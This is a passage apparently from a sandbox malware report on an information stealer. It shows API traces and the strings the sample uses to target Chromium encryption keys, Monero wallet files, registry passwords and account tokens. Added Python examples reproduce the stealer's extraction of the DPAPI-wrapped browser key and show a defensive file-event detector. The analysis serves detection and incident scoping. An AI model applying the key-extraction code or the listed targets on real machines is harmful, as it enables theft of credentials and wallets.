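                                 This function resolves a folder under CSIDL 0x1C (the local application data directory), checks that a file exists there, reads it, searches the content for the literal `"encrypted_key":"` and runs the result through CryptStringToBinaryA twice with flag 1 (CRYPT_STRING_BASE64: one call for the output size, one to decode), which is how a stealer pulls the protected AES key out of a Chromium "Local State" file. The script below is an added example, not code from the report or from the sample: it shows the same substring-and-base64 extraction next to a parser-based version, and strips the `DPAPI` prefix that Chromium on Windows places in front of the protected key (a Chromium behaviour, not something the report shows). The Local State document and the key blob are constructed; nothing is decrypted.

```python
"""Pull the DPAPI-wrapped AES key out of a Chromium "Local State" document.

Added example, not code from the Joe Sandbox report or from the sample. The
substring route mirrors StrStrA("\"encrypted_key\":\"") followed by
CryptStringToBinaryA(..., CRYPT_STRING_BASE64) in the function above; the
parser route is the robust way to get the same bytes. The "DPAPI" prefix is
what Chromium on Windows prepends to the protected key before base64-encoding
it. The document and the key blob below are constructed for this example.
"""
import base64
import json
from typing import Optional

MARKER = '"encrypted_key":"'
DPAPI_PREFIX = b"DPAPI"
SAMPLE_BLOB = bytes(range(1, 33))  # stand-in for a DPAPI-protected key; constructed, not a real blob


def build_local_state(wrapped_key: bytes, pretty: bool = False) -> str:
    """Constructed Local State document carrying the given protected key."""
    doc = {
        "os_crypt": {"encrypted_key": base64.b64encode(DPAPI_PREFIX + wrapped_key).decode("ascii")},
        "profile": {"last_used": "Default"},
    }
    # Compact output yields the exact marker the stealer searches for; pretty output inserts a space.
    return json.dumps(doc, indent=2 if pretty else None, separators=None if pretty else (",", ":"))


def extract_by_substring(text: str) -> Optional[bytes]:
    """The stealer's approach: locate the marker, cut at the next double quote, base64-decode."""
    i = text.find(MARKER)
    if i < 0:
        return None
    start = i + len(MARKER)
    end = text.find('"', start)
    if end < 0:
        return None
    try:
        return base64.b64decode(text[start:end], validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def extract_by_json(text: str) -> Optional[bytes]:
    """Parser-based equivalent; insensitive to whitespace and key order."""
    try:
        return base64.b64decode(json.loads(text)["os_crypt"]["encrypted_key"], validate=True)
    except (ValueError, KeyError, TypeError):
        return None


def dpapi_payload(blob: Optional[bytes]) -> Optional[bytes]:
    """Return the DPAPI blob that CryptUnprotectData would consume, or None if the prefix is missing."""
    if blob is None or not blob.startswith(DPAPI_PREFIX):
        return None
    return blob[len(DPAPI_PREFIX):]


if __name__ == "__main__":
    compact = build_local_state(SAMPLE_BLOB)
    pretty = build_local_state(SAMPLE_BLOB, pretty=True)
    print("compact, substring:", dpapi_payload(extract_by_substring(compact)) == SAMPLE_BLOB)
    print("pretty,  substring:", extract_by_substring(pretty))  # None: marker has a space after the colon
    print("pretty,  json     :", dpapi_payload(extract_by_json(pretty)) == SAMPLE_BLOB)
```

                                 The substring route is only as reliable as the exact byte sequence it searches for, which is why the sample's behaviour is tied to the compact form Chromium writes; a parser does not have that dependency. For incident scoping, the useful fact is that the key blob itself is still DPAPI-protected, so it is only usable on the victim machine (or with the user's DPAPI master key), which is why stealers decrypt it locally before exfiltration rather than sending the file.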
                                APIs
                                  • Part of subcall function 008B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B12B4
                                  • Part of subcall function 008B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 008B12BB
                                  • Part of subcall function 008B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008B12D7
                                  • Part of subcall function 008B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008B12F5
                                  • Part of subcall function 008B12A0: RegCloseKey.ADVAPI32(?), ref: 008B12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 008B134F
                                • lstrlen.KERNEL32(?), ref: 008B135C
                                • lstrcat.KERNEL32(?,.keys), ref: 008B1377
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C8B60: GetSystemTime.KERNEL32(008D0E1A,007BCF28,008D05AE,?,?,008B13F9,?,0000001A,008D0E1A,00000000,?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008C8B86
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 008B1465
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                  • Part of subcall function 008B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                  • Part of subcall function 008B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                  • Part of subcall function 008B99C0: ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                  • Part of subcall function 008B99C0: LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                  • Part of subcall function 008B99C0: CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 008B14EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 42326dc2b0b28400169b6cfb0e85ab546093b9df450a38d799bf063f7799e2fb
                                • Instruction ID: cdc48a6f818ad97ac98349a66d55bb3bd54c7a6a1d4e2f2448c1aa7f9571c05a
                                • Opcode Fuzzy Hash: 42326dc2b0b28400169b6cfb0e85ab546093b9df450a38d799bf063f7799e2fb
                                • Instruction Fuzzy Hash: FA5121B195011857CB19EB64DC96FED733CFB54704F4041ACB60AE6181EE70AB8ACAA7
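                                 The sequence in this function is: read `wallet_path` from `SOFTWARE\monero-project\monero-core`, append `.keys` (or fall back to `\Monero\wallet.keys`), copy the wallet file to a fresh path with CopyFileA, read the copy, and remove it again with DeleteFileA. The staged copy therefore exists only for the length of the read, which is a pattern that file-event telemetry can catch even when it cannot see the read of the original. The correlation below is an added example, not code from the report or from the sample; the event fields (ts, pid, kind, path) are an assumption loosely modelled on Sysmon FileCreate / FileDelete records and the events are constructed.

```python
"""Find files that one process creates and deletes again within a short window.

Added example, not code from the Joe Sandbox report or from the sample. The
function above copies the wallet .keys file (CopyFileA), reads the copy and
deletes it (DeleteFileA). The events below are constructed; their field names
are an assumption loosely modelled on Sysmon FileCreate / FileDelete records.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class FileEvent:
    ts: float   # seconds on a constructed clock
    pid: int
    kind: str   # "create" or "delete"
    path: str


def transient_files(events: List[FileEvent], window: float = 10.0) -> List[Tuple[int, str, float]]:
    """(pid, path, lifetime) for every file deleted by its creating process within `window` seconds.

    Events are sorted by timestamp first, so out-of-order delivery does not break pairing.
    A delete with no preceding create from the same pid is ignored, as is a delete by another pid.
    """
    pending: Dict[Tuple[int, str], float] = {}
    found: List[Tuple[int, str, float]] = []
    for ev in sorted(events, key=lambda e: e.ts):
        key = (ev.pid, ev.path.lower())
        if ev.kind == "create":
            pending[key] = ev.ts
        elif ev.kind == "delete" and key in pending:
            lifetime = ev.ts - pending.pop(key)
            if lifetime <= window:
                found.append((ev.pid, ev.path, lifetime))
    return found


# Constructed sample: pid 4242 stages a copy and removes it half a second later.
SAMPLE_EVENTS = [
    FileEvent(1000.5, 4242, "delete", r"C:\Users\u\AppData\Local\Temp\stage.tmp"),   # delivered out of order
    FileEvent(1000.0, 4242, "create", r"C:\Users\u\AppData\Local\Temp\stage.tmp"),
    FileEvent(1001.0, 1234, "create", r"C:\Users\u\Documents\report.docx"),            # never deleted
    FileEvent(1005.0, 4242, "create", r"C:\Users\u\AppData\Local\Temp\long.tmp"),
    FileEvent(1100.0, 4242, "delete", r"C:\Users\u\AppData\Local\Temp\long.tmp"),    # outside the window
    FileEvent(1006.0, 9999, "delete", r"C:\Users\u\AppData\Local\Temp\orphan.tmp"),  # no matching create
]

if __name__ == "__main__":
    for pid, path, life in transient_files(SAMPLE_EVENTS):
        print(f"pid {pid} held {path} for {life:.1f}s")
```

                                 On its own a short-lived temporary file is common, so treat the hit as a pivot rather than an alert: join it with the creating process's image path and with any network activity that follows, and in this sample's case with the registry read of `SOFTWARE\monero-project\monero-core`, which ordinary file telemetry does not record.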
                                APIs
                                  • Part of subcall function 008B72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008B733A
                                  • Part of subcall function 008B72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008B73B1
                                  • Part of subcall function 008B72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 008B740D
                                  • Part of subcall function 008B72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 008B7452
                                  • Part of subcall function 008B72D0: HeapFree.KERNEL32(00000000), ref: 008B7459
                                • lstrcat.KERNEL32(00000000,008D17FC), ref: 008B7606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 008B7648
                                • lstrcat.KERNEL32(00000000, : ), ref: 008B765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 008B768F
                                • lstrcat.KERNEL32(00000000,008D1804), ref: 008B76A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 008B76D3
                                • lstrcat.KERNEL32(00000000,008D1808), ref: 008B76ED
                                • task.LIBCPMTD ref: 008B76FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: a65f1f84a72e6c2874d7364abc8ba61025f263bc6755ad91e9fa60fe0f3e791e
                                • Instruction ID: de743cf3ff20f6de020c3c780b6daf1c5ee4c53f4c6189951ad64f6d45c63570
                                • Opcode Fuzzy Hash: a65f1f84a72e6c2874d7364abc8ba61025f263bc6755ad91e9fa60fe0f3e791e
                                • Instruction Fuzzy Hash: 123118B1901209EBCB48EBE8DC99DFE7778FB64341B144118E106EB391DA74A947CB92
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,007BDC08,00000000,?,008D0E2C,00000000,?,00000000), ref: 008C8130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C8137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008C8158
                                • __aulldiv.LIBCMT ref: 008C8172
                                • __aulldiv.LIBCMT ref: 008C8180
                                • wsprintfA.USER32 ref: 008C81AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: bd3488b34dbd326b6e7cf28c4ee3f95614964c7b7f287caa60aa849a42e78d7d
                                • Instruction ID: d05220539e62380064d1cf51dbfb5f3a747c2ab24839e9a13841823c00f07788
                                • Opcode Fuzzy Hash: bd3488b34dbd326b6e7cf28c4ee3f95614964c7b7f287caa60aa849a42e78d7d
                                • Instruction Fuzzy Hash: 762108B1E44218ABDB00DFD5DC49FAEB7B8FB44B14F104619F615BB280D7B8A9018BA5
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008B733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008B73B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 008B740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 008B7452
                                • HeapFree.KERNEL32(00000000), ref: 008B7459
                                • task.LIBCPMTD ref: 008B7555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: b88a4b844b1a9b6436157c3028ef2c18608eb4243d193111e28fcd6fb5a8bf72
                                • Instruction ID: 904518035c25f6bb272095e263b09b11a319dc6a7dace01ac952eaaee63911cc
                                • Opcode Fuzzy Hash: b88a4b844b1a9b6436157c3028ef2c18608eb4243d193111e28fcd6fb5a8bf72
                                • Instruction Fuzzy Hash: 57611CB590425C9BDB24DB54CC45BD9B7BCFF48344F0081E9E689A6241DB706BC9CFA1
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                • lstrlen.KERNEL32(00000000), ref: 008BBC9F
                                  • Part of subcall function 008C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008C8E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 008BBCCD
                                • lstrlen.KERNEL32(00000000), ref: 008BBDA5
                                • lstrlen.KERNEL32(00000000), ref: 008BBDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: 84bce80544001ec1fe892fc3ab56b80227583cc61916510f834c1fad944b51d8
                                • Instruction ID: 627f41f51ca3d259cfafe8ad120ca57beacabc09caf1c2fc9a408ea90a1fc747
                                • Opcode Fuzzy Hash: 84bce80544001ec1fe892fc3ab56b80227583cc61916510f834c1fad944b51d8
                                • Instruction Fuzzy Hash: 0FB1FB71910108ABDB18EBA8DD96EEE7738FF54304F40416DF506E6191EF34AA49CBA3
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 4906a8301fd0e2e5cdf2a0713434f1c1fe9583f600b1a15e012c793d15be417b
                                • Instruction ID: 7d4b7a50bd5fb1e1119b1fa1e1f59297c5975465a08d5969cad2e2994cf18e76
                                • Opcode Fuzzy Hash: 4906a8301fd0e2e5cdf2a0713434f1c1fe9583f600b1a15e012c793d15be417b
                                • Instruction Fuzzy Hash: 93F03AB1904209EFD344EFE0A909FBC7B70FB15702F0402A8E609C6290EA705A52DBD6
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,007BD240,00000000,00020119,?), ref: 008C40F4
                                • RegQueryValueExA.ADVAPI32(?,007BDE78,00000000,00000000,00000000,000000FF), ref: 008C4118
                                • RegCloseKey.ADVAPI32(?), ref: 008C4122
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4147
                                • lstrcat.KERNEL32(?,007BDEC0), ref: 008C415B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValue
                                • String ID: P{
                                • API String ID: 690832082-680765652
                                • Opcode ID: e4bd32d7475958d50dfd70749423c1ec46f33cdf3e6505ad2d884886b27a6f2c
                                • Instruction ID: 1d60bead56c8aa5aabd64a6ac747d38e13df8cbfd1c7d82aefb6c237fa37ac93
                                • Opcode Fuzzy Hash: e4bd32d7475958d50dfd70749423c1ec46f33cdf3e6505ad2d884886b27a6f2c
                                • Instruction Fuzzy Hash: 3D41C8B69001086BDB24EBE0DC56FFD373CF758300F40854CB61996181EA719B89CBA3
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008B4FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008B4FD1
                                • InternetOpenA.WININET(008D0DDF,00000000,00000000,00000000,00000000), ref: 008B4FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 008B5011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 008B5041
                                • InternetCloseHandle.WININET(?), ref: 008B50B9
                                • InternetCloseHandle.WININET(?), ref: 008B50C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 12e06e79a02ec0059341a183f111cbf89fd07d846a2fba0711cd171ffeef7cc7
                                • Instruction ID: c01b3bcf289352777c429bc2f3a5b90ab0006382eb2c6345dc7aff9e88c5ed31
                                • Opcode Fuzzy Hash: 12e06e79a02ec0059341a183f111cbf89fd07d846a2fba0711cd171ffeef7cc7
                                • Instruction Fuzzy Hash: 5131E7F4A0021CABDB20DF94DC85BDDB7B4FB48704F1081D9E609A7281D7706E868F99
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008C8426
                                • wsprintfA.USER32 ref: 008C8459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 008C847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C8499
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                • RegQueryValueExA.ADVAPI32(00000000,007BDCC8,00000000,000F003F,?,00000400), ref: 008C84EC
                                • lstrlen.KERNEL32(?), ref: 008C8501
                                • RegQueryValueExA.ADVAPI32(00000000,007BDD10,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,008D0B34), ref: 008C8599
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C8608
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C861A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                • String ID: %s\%s
                                • API String ID: 3896182533-4073750446
                                • Opcode ID: 826cd0760dafd0c0a02eec0e58d2d4b2baca6b4b515d19873c1b056e24c4a1d0
                                • Instruction ID: e34dc81abfb5505ac966a4df69987f5323bd167ae220acd66040bdd734fb44a5
                                • Opcode Fuzzy Hash: 826cd0760dafd0c0a02eec0e58d2d4b2baca6b4b515d19873c1b056e24c4a1d0
                                • Instruction Fuzzy Hash: 4E2119B194021CABDB24DB94DC85FE9B3B8FB58704F00C5D9E609A6140DF71AA86CFD4
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C76A4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C76AB
                                • RegOpenKeyExA.ADVAPI32(80000002,007ABB58,00000000,00020119,00000000), ref: 008C76DD
                                • RegQueryValueExA.ADVAPI32(00000000,007BDB48,00000000,00000000,?,000000FF), ref: 008C76FE
                                • RegCloseKey.ADVAPI32(00000000), ref: 008C7708
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 9840f0dd58abba4b8ca8cf159f7017e18068289aac45b4b39ac0ffe70030e47a
                                • Instruction ID: bb63c7ef8842d63651bc1e810cb2ac29a3827a03a401eae917e9b00820af6e36
                                • Opcode Fuzzy Hash: 9840f0dd58abba4b8ca8cf159f7017e18068289aac45b4b39ac0ffe70030e47a
                                • Instruction Fuzzy Hash: BF014FF5A04208BFD700DBE4DC49FB9B7B8EB58701F108158FA09D7290D6B0A905CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008C7734
                                • RtlAllocateHeap.NTDLL(00000000), ref: 008C773B
                                • RegOpenKeyExA.ADVAPI32(80000002,007ABB58,00000000,00020119,008C76B9), ref: 008C775B
                                • RegQueryValueExA.ADVAPI32(008C76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 008C777A
                                • RegCloseKey.ADVAPI32(008C76B9), ref: 008C7784
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 61ef619446f97e74c4ee90071e67cc391ae94f2fc5ac051131a0ef52fdc4e2b8
                                • Instruction ID: 0c14404e6cd51807b9234f01bec2d95099cb00aab6f254be09f990d8a3c4f3c0
                                • Opcode Fuzzy Hash: 61ef619446f97e74c4ee90071e67cc391ae94f2fc5ac051131a0ef52fdc4e2b8
                                • Instruction Fuzzy Hash: 9F01E1F5A40208BBD700DBE4DC49FBEB7B8EB58705F104559FA09E7281D6B4A501CB91
                                APIs
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                • GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                • LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                • ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                • LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                • CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                 • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmp
